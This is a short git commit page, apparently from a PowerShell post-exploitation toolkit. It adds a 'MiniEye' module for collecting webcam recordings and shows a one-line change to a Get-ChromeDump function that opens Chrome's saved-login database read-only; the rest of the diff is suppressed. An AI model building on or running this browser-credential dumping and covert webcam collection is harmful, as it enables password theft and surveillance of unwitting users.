Added MiniEye collection module; Minor change to ChromeDump
MiniEye - Collect recordings from Webcam. ChromeDump - Modified sqlite DB connection string for read-only access.1.6
parent
e43fb94634
commit
523e4458c1
|
@ -121,7 +121,7 @@ Function Get-ChromeDump{
|
|||
if(!($NoPasswords)){
|
||||
|
||||
#Parse the login data DB
|
||||
$connStr = "Data Source=$loginDatadb; Version=3;"
|
||||
$connStr = "Data Source=$loginDatadb; Read Only=True; Version=3;"
|
||||
|
||||
$connection = New-Object System.Data.SQLite.SQLiteConnection($connStr)
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
Loading…
Reference in New Issue